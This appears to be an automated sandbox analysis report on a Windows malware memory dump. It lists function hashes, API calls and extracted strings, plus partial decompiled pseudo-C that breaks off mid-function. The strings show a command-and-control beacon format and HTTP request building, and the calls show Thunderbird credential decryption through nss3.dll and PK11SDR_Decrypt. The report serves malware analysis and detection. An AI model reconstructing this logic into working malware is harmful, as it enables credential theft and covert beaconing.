Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorStatus
String ID:
API String ID: 1596131371-0
Opcode ID: 25f2fbeea5e36f61a39bb537757afd31f327ffcf754dc072db5f948405d26d6e
Instruction ID: ea0bd7db05680d7bb47c029fc55f1d8efed83d6f280c12bb3b05048db8bdc81b
Opcode Fuzzy Hash: 25f2fbeea5e36f61a39bb537757afd31f327ffcf754dc072db5f948405d26d6e
Instruction Fuzzy Hash: 2AC01231A442116FDE3C9E10D91AE6B7F15AB90380F40481DB54980070CBF4A890CA21

Uniqueness

Uniqueness Score: -1.00%

Function 0540C307, Relevance: .7, Instructions: 669COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96d44f4e1cd22fc44ac23f5c67a74349936f30fa8c634bb55f722c77b5bf4d63
Instruction ID: 01c73a2da732ef788f46296fdcad14a589c1359b4aec10a1bb33cf557d0915e5
Opcode Fuzzy Hash: 96d44f4e1cd22fc44ac23f5c67a74349936f30fa8c634bb55f722c77b5bf4d63
Instruction Fuzzy Hash: 62425771A00218DBCF18CF68C5D46EDBBF2FF84311F2492AAD852AB285D7349A45DF90

Uniqueness

Uniqueness Score: -1.00%

Function 05421669, Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5d63ed145622a63cf05cf27da2f512a55c84475239d32127d3dfe5da927ad0b
Instruction ID: 3b0a0b0205ad4228f24d9ad9477918b9f012dcdd5a60f57370a5680b9b905d0e
Opcode Fuzzy Hash: e5d63ed145622a63cf05cf27da2f512a55c84475239d32127d3dfe5da927ad0b
Instruction Fuzzy Hash: 21425C30A04B658FCB25CF69C490AFAB7F2FF89304F94996EC48A97751D734A586CB40

Uniqueness

Uniqueness Score: -1.00%

Function 05423C5C, Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction ID: 9f1e55c7bb2e3e4986108fde1db3984061de2bfbb036e62219c4801be0f7895a
Opcode Fuzzy Hash: 12a708cca95c067f8c5f248a7bd5d537db9c68be24864f17fb345cea860a6527
Instruction Fuzzy Hash: 21F13630A08669ABCB0CCF99D0A09FDBBB2FF89314B14C59EE49667745C7386A45CF14

Uniqueness

Uniqueness Score: -1.00%

Function 05413604, Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 57985d13d4fa9532eb3380c6df765e76c61d51f260dcf856cb1d4bd0d6e324e7
Instruction ID: 51f08f2191e735736f45488cea10b508c0477ee8974269808b7dadc22b67b883
Opcode Fuzzy Hash: 57985d13d4fa9532eb3380c6df765e76c61d51f260dcf856cb1d4bd0d6e324e7
Instruction Fuzzy Hash: 7FC1ED75604B508FD325CF2AC580AA6B7E2BF49304B548D6ED9D787B61DB36F882CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0277AF34, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E0277AF34(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E0277B09F(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E0277B159(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E0277B044(_t55, _t66);
										_t89 = _t66 + 0x10;
										E0277B09F(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E0277B13B(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x0277af38
0x0277af39
0x0277af3a
0x0277af3d
0x0277af3f
0x0277af42
0x0277af43
0x0277af45
0x0277af46
0x0277af47
0x0277af4a
0x0277af54
0x0277b005
0x0277b00c
0x0277b015
0x0277af5a
0x0277af5a
0x0277af60
0x0277af66
0x0277af69
0x0277af6c
0x0277af70
0x0277af75
0x0277af7a
0x0277affa
0x00000000
0x0277af7c
0x0277af7c
0x0277af88
0x0277af8a
0x0277afe5
0x0277afe5
0x0277afeb
0x00000000
0x0277af8c
0x0277af9b
0x0277af9d
0x0277af9e
0x0277af9f
0x0277afa2
0x0277afa2
0x0277afa4
0x00000000
0x0277afa6
0x0277afa6
0x0277aff0
0x0277afa8
0x0277afa8
0x0277afac
0x0277afb4
0x0277afb9
0x0277afbe
0x0277afca
0x0277afd2
0x0277afd9
0x0277afdf
0x0277afe3
0x00000000
0x0277afe3
0x0277afa6
0x0277afa4
0x00000000
0x0277af8a
0x0277affe
0x0277affe
0x0277affe
0x0277af7a
0x0277b01a
0x0277b021

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 94d9cd4e73e17da3c53bb9e1379003f257bbaed5e9df138eb8267b052865cce2
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 4B21B3739002049FDF14EF68C8C49ABBBA5FF49354B4A81A8E9159B245EB30F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0541D91F, Relevance: 59.0, APIs: 39, Instructions: 456synchronizationtimethreadCOMMON

Download Yara Rule

APIs

Part of subcall function 0541A366: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0541A39A
Part of subcall function 0541A366: GetLastError.KERNEL32(?), ref: 0541A45B
Part of subcall function 0541A366: ReleaseMutex.KERNEL32(00000000), ref: 0541A464

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0541D9BD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?), ref: 0541DA20
StrChrA.SHLWAPI(00000000,0000007C,00000000,00000000), ref: 0541DA94
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 0541DAB6
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0541DAF6

Part of subcall function 0540DDD9: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0540DDFB
Part of subcall function 0540DDD9: HeapFree.KERNEL32(00000000,00000000,00000129,00000000,00000000,?), ref: 0540DE2C

WaitForMultipleObjects.KERNEL32(00008005,?,00000000,000000FF), ref: 0541DB9C
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DBD1
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DBE0
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0541DC0D
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0541DC27
_allmul.NTDLL(00000258,00000000,FF676980,000000FF), ref: 0541DC6F
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000258,00000000,FF676980,000000FF), ref: 0541DC89
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0541DC9F
ReleaseMutex.KERNEL32(?), ref: 0541DCBC
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DCCD
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DCDC
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0541DD10

Part of subcall function 05423A13: RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 05423A31
Part of subcall function 05423A13: RegQueryValueExA.ADVAPI32(?,Main,00000000,7519F710,00000000,?,7519F710,00000000), ref: 05423A56
Part of subcall function 05423A13: RtlAllocateHeap.NTDLL(00000000,?), ref: 05423A67
Part of subcall function 05423A13: RegQueryValueExA.ADVAPI32(?,Main,00000000,00000000,00000000,?), ref: 05423A82
Part of subcall function 05423A13: HeapFree.KERNEL32(00000000,?), ref: 05423AA0
Part of subcall function 05423A13: RegCloseKey.ADVAPI32(?), ref: 05423AA9

SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0541DD2A
SwitchToThread.KERNEL32 ref: 0541DD2C
ReleaseMutex.KERNEL32(?), ref: 0541DD36
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DD74
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DD7F
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 0541DDA2
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 0541DDBC
SwitchToThread.KERNEL32 ref: 0541DDBE
ReleaseMutex.KERNEL32(?), ref: 0541DDC8
WaitForSingleObject.KERNEL32(?,00000000), ref: 0541DDDD
CloseHandle.KERNEL32(?), ref: 0541DE2B
CloseHandle.KERNEL32(?), ref: 0541DE3F
CloseHandle.KERNEL32(?), ref: 0541DE4B
CloseHandle.KERNEL32(?), ref: 0541DE57
CloseHandle.KERNEL32(?), ref: 0541DE63
CloseHandle.KERNEL32(?), ref: 0541DE6F
CloseHandle.KERNEL32(?), ref: 0541DE7B
CloseHandle.KERNEL32(?), ref: 0541DE87
RtlExitUserThread.NTDLL(00000000), ref: 0541DE96
RtlAllocateHeap.NTDLL(00000000,00000838,7519F560), ref: 0541DEAD
RtlInitializeCriticalSection.NTDLL(00000000), ref: 0541DEBA
GetLastError.KERNEL32 ref: 0541DF01

Part of subcall function 0541D34C: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0541D366
Part of subcall function 0541D34C: CreateWaitableTimerA.KERNEL32(0542E0E4,00000003,?), ref: 0541D383
Part of subcall function 0541D34C: GetLastError.KERNEL32(?,?,0541A3CE,?), ref: 0541D394
Part of subcall function 0541D34C: GetSystemTimeAsFileTime.KERNEL32(?,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D3D4
Part of subcall function 0541D34C: SetWaitableTimer.KERNEL32(?,0541A3CE,00000000,00000000,00000000,00000000,?,?,0541A3CE,?), ref: 0541D3F3
Part of subcall function 0541D34C: HeapFree.KERNEL32(00000000,0541A3CE,00000000,0541A3CE,?,?,?,0541A3CE,?), ref: 0541D409

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Wait$Close$Handle$ObjectSingleTimerWaitable$Heap$MultipleObjects$MutexRelease_allmul$AllocateErrorFreeLastThread$CreateOpenQuerySwitchTimeValue$CriticalEventExitFileInitializeSectionSystemTrimUser
String ID:
API String ID: 3684612342-0
Opcode ID: 54c7954c8eeb7becf4eaeff3755cb3e55a4e18a9b954d13a0f6bf552c7c7e9aa
Instruction ID: c1e5ab82d54b84c1700dd76e06542538bc3cf8076bec22c3c6a725d8794596c3
Opcode Fuzzy Hash: 54c7954c8eeb7becf4eaeff3755cb3e55a4e18a9b954d13a0f6bf552c7c7e9aa
Instruction Fuzzy Hash: 6FF1A1B1918320AFC7209F65CC85DEBBBE9FB84354F450A2EF99593290DB709801CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 05425BE4, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 378memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(,?,0542E098), ref: 05425C3C
RtlAllocateHeap.NTDLL(00000000,0542DAA9,?), ref: 05425CD6
lstrcpyn.KERNEL32(00000000,?,0542DAA9,?,0542E098), ref: 05425CEB
HeapFree.KERNEL32(00000000,00000000,00000000,?,0542E098), ref: 05425D07
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,?,0542E098), ref: 05425DE2
StrChrA.SHLWAPI(00000001,00000020,?,0542E098), ref: 05425DF3
lstrlen.KERNEL32(00000000,?,0542E098), ref: 05425E07
memmove.NTDLL(0542DAA9,?,00000001,?,0542E098), ref: 05425E17
lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,0542E098), ref: 05425E3A
RtlAllocateHeap.NTDLL(00000000,?), ref: 05425E60
memcpy.NTDLL(00000000,?,?,?,0542E098), ref: 05425E74
memcpy.NTDLL(0542DAA8,?,?,?,0542E098), ref: 05425E94
HeapFree.KERNEL32(00000000,0542DAA8,?,?,?,?,?,?,?,?,0542E098), ref: 05425ED0
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05425F96
HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 05425FDE

Strings

, xrefs: 05425C37, 05425C68
PUT , xrefs: 05425C10
gzip, deflate, xrefs: 05425E22
ocsp, xrefs: 05425D4F
Content-Type:, xrefs: 05425D42
GET , xrefs: 05425DCF
Accept-Encoding:, xrefs: 05425E27
OPTI, xrefs: 05425C1E
GET , xrefs: 05425C09
POST, xrefs: 05425C17
OPTI, xrefs: 05425DD7
User-Agent:, xrefs: 05425CB5

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: $ gzip, deflate$Accept-Encoding:$Content-Type:$GET $GET $OPTI$OPTI$POST$PUT $User-Agent:$ocsp
API String ID: 3227826163-537135598
Opcode ID: bbffed0961589dda36a8ae7b83bee856b2c0ddad7239be68fa8dbfd5f3bae1f5
Instruction ID: 7b7f264b99aa97c4aaeefe15911c9bbeaa9d51c420603ed2a7e936ffe1d87ecb
Opcode Fuzzy Hash: bbffed0961589dda36a8ae7b83bee856b2c0ddad7239be68fa8dbfd5f3bae1f5
Instruction Fuzzy Hash: C6D16D31A04225AFDB25DFA9C849BEEBBB5FF04300F94809AF916EB250DB70D951DB50

Uniqueness

Uniqueness Score: -1.00%

Function 054170AE, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 284memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 054170E6
wsprintfA.USER32 ref: 05417149
wsprintfA.USER32 ref: 05417192
wsprintfA.USER32 ref: 054171B6
lstrcat.KERNEL32(?,726F7426), ref: 054171F0
wsprintfA.USER32 ref: 0541720F
wsprintfA.USER32 ref: 05417228
wsprintfA.USER32 ref: 0541724C
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05417269
RtlEnterCriticalSection.NTDLL(05958D20), ref: 0541728A
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 054172AA

Part of subcall function 0541F1BA: lstrlen.KERNEL32(00000000,253D7325,00000000,751881D0,00000000,?,?,0541331C,00000000,05958D60), ref: 0541F1E5
Part of subcall function 0541F1BA: lstrlen.KERNEL32(?,?,?,0541331C,00000000,05958D60), ref: 0541F1ED
Part of subcall function 0541F1BA: strcpy.NTDLL ref: 0541F204
Part of subcall function 0541F1BA: lstrcat.KERNEL32(00000000,?), ref: 0541F20F
Part of subcall function 0541F1BA: StrTrimA.SHLWAPI(00000000,=,00000000,?,?,0541331C,00000000,05958D60), ref: 0541F22C

StrTrimA.SHLWAPI(00000000,054283F4,?,05958D60), ref: 054172DE

Part of subcall function 05407238: lstrlen.KERNEL32(?,?,00000000,0540AA96,00000000,\Vars,Software\AppDataLow\Software\Microsoft\,00000000,?,00000000,00000000), ref: 05407244
Part of subcall function 05407238: lstrlen.KERNEL32(?), ref: 0540724C
Part of subcall function 05407238: lstrcpy.KERNEL32(00000000,?), ref: 05407263
Part of subcall function 05407238: lstrcat.KERNEL32(00000000,?), ref: 0540726E

lstrcpy.KERNEL32(?,00000000), ref: 0541730E
lstrcat.KERNEL32(?,?), ref: 0541731C
lstrcat.KERNEL32(?,?), ref: 05417326
RtlEnterCriticalSection.NTDLL(05958D20), ref: 05417331
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 0541734D

Part of subcall function 05423164: memset.NTDLL ref: 0542319D
Part of subcall function 05423164: memcpy.NTDLL(?,?,00000090,00000000,00000000,0000009F,0000009F,?,00000090,?), ref: 054231A9

HeapFree.KERNEL32(00000000,?,00000010,?,?,05958D60,00000001), ref: 05417413
HeapFree.KERNEL32(00000000,?,?), ref: 05417425
HeapFree.KERNEL32(00000000,?,?,05958D60), ref: 05417437
HeapFree.KERNEL32(00000000,00000000), ref: 05417449
HeapFree.KERNEL32(00000000,?), ref: 0541745B

Strings

version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s, xrefs: 05417143

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$wsprintf$Freelstrcat$CriticalSectionlstrlen$AllocateEnterLeaveTrimlstrcpy$memcpymemsetstrcpy
String ID: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
API String ID: 1483892062-2898318522
Opcode ID: 8b560b978e814af9f815e28880928c114ff68c47d78ec5d6a1f9622e1ad21a3f
Instruction ID: 9f84222e28e90fbaec11c597582b2a4d528b651c4f2f0fca7890d6d248d753a6
Opcode Fuzzy Hash: 8b560b978e814af9f815e28880928c114ff68c47d78ec5d6a1f9622e1ad21a3f
Instruction Fuzzy Hash: 57B1AC71614221AFD715CF69DC46EEA7BE8FB48304F84442AF948D7260DB70D826CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 054130EC, Relevance: 39.3, APIs: 26, Instructions: 258memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0541310D
GetTickCount.KERNEL32 ref: 05413127
wsprintfA.USER32 ref: 0541317A
QueryPerformanceFrequency.KERNEL32(?), ref: 05413186
QueryPerformanceCounter.KERNEL32(?), ref: 05413191
_aulldiv.NTDLL(?,?,?,?), ref: 054131A7
wsprintfA.USER32 ref: 054131BD
wsprintfA.USER32 ref: 054131DB
wsprintfA.USER32 ref: 054131F2
wsprintfA.USER32 ref: 05413213
wsprintfA.USER32 ref: 0541324E
wsprintfA.USER32 ref: 05413272
lstrcat.KERNEL32(?,726F7426), ref: 054132AA
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 054132C4
GetTickCount.KERNEL32 ref: 054132D4
RtlEnterCriticalSection.NTDLL(05958D20), ref: 054132E8
RtlLeaveCriticalSection.NTDLL(05958D20), ref: 05413306
StrTrimA.SHLWAPI(00000000,054283F4,00000000,05958D60), ref: 0541333B
lstrcpy.KERNEL32(00000000,00000000), ref: 05413361
lstrcat.KERNEL32(00000000,?), ref: 0541336C
lstrcat.KERNEL32(00000000,00000000), ref: 05413370
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,?,00000000), ref: 054133F1
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05413400
HeapFree.KERNEL32(00000000,00000000,00000000,05958D60), ref: 0541340F
HeapFree.KERNEL32(00000000,00000000), ref: 05413421
HeapFree.KERNEL32(00000000,?), ref: 05413433

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heapwsprintf$Free$lstrcat$AllocateCountCriticalPerformanceQuerySectionTick$CounterEnterFrequencyLeaveTrim_aulldivlstrcpy
String ID:
API String ID: 2878544442-0
Opcode ID: dbe38d4393a3e7553483fdaceca57eb34641e7763b02e276bc214954b7e45333
Instruction ID: f97453cf5b9cb68a1ced455a0bb2c5ebb67998d988876d941e2b69b16d9b5b5a
Opcode Fuzzy Hash: dbe38d4393a3e7553483fdaceca57eb34641e7763b02e276bc214954b7e45333
Instruction Fuzzy Hash: 32A19071514225AFDB25CFA9DC4AEEA3FE8FB48304F444426F908D6250DB70D825DF6A

Uniqueness

Uniqueness Score: -1.00%

Function 0540EAD1, Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 93libraryloaderstringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EADE

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB07
lstrcpyW.KERNEL32(-0000FFFE,?), ref: 0540EB27
lstrcpyW.KERNEL32(-00000002,nss3.dll), ref: 0540EB3A
SetCurrentDirectoryW.KERNEL32(?,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB46
LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB49
SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EB55
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0540EB67
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0540EB76
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0540EB85
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0540EB94
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0540EBA3
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0540EBB2
FreeLibrary.KERNEL32(00000000,?,?,?,05404D5E,?,%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\*.default), ref: 0540EBDB

Strings

NSS_Shutdown, xrefs: 0540EB70
NSS_Init, xrefs: 0540EB61
PK11_Authenticate, xrefs: 0540EB9D
PK11SDR_Decrypt, xrefs: 0540EBAC
nss3.dll, xrefs: 0540EB31
PK11_FreeSlot, xrefs: 0540EB8E
PK11_GetInternalKeySlot, xrefs: 0540EB7F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
API String ID: 3772355505-3659000792
Opcode ID: c852eb88a927df5b46984860c21419c82f5db0c1fafce487ec0d69a48b0dbb4e
Instruction ID: b3a0d3c25059dec862636aacf051687210fa7adcc38d7235adca2119313b7b04
Opcode Fuzzy Hash: c852eb88a927df5b46984860c21419c82f5db0c1fafce487ec0d69a48b0dbb4e
Instruction Fuzzy Hash: 19218471909316BFD720EF718D4AE9B7FECBF04784B105937B80AD2251EB74D4248AA0

Uniqueness

Uniqueness Score: -1.00%

Function 02776A9C, Relevance: 34.7, APIs: 23, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E02776A9C(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x277d1f0, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x277d018; // 0x2a8ae8b0
					asm("bswap eax");
					_t32 =  *0x277d014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x277d010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x277d00c; // 0x69ab8210
					asm("bswap eax");
					_t35 =  *0x277d230; // 0x27ba5a8
					_t2 = _t35 + 0x277e622; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d144, _t34, _t33, _t32, _t31,  *0x277d02c,  *0x277d004, _t110);
					_t38 = E02777C34();
					_t39 =  *0x277d230; // 0x27ba5a8
					_t3 = _t39 + 0x277e662; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x277d230; // 0x27ba5a8
						_t7 = _t92 + 0x277e66d; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E02775728(_t99);
					_t44 =  *0x277d230; // 0x27ba5a8
					_t9 = _t44 + 0x277e38a; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x277d230; // 0x27ba5a8
					_t11 = _t48 + 0x277e33b; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x277d288; // 0x4f395b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x277d230; // 0x27ba5a8
						_t13 = _t88 + 0x277e685; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x277d2dc; // 0x4f39630
					_a28 = E02778A9B(0x277d00a, _t105 + 4);
					_t55 =  *0x277d278; // 0x4f395e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x277d230; // 0x27ba5a8
						_t16 = _t84 + 0x277e8ea; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x277d274; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x277d230; // 0x27ba5a8
						_t18 = _t81 + 0x277e8c1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x277d1f0, _t107, 0x800);
						if(_t98 != _t107) {
							E02777C61(GetTickCount());
							_t62 =  *0x277d2dc; // 0x4f39630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x277d2dc; // 0x4f39630
							__imp__(_t66 + 0x40);
							_t68 =  *0x277d2dc; // 0x4f39630
							_t115 = E0277140D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x277c2c4);
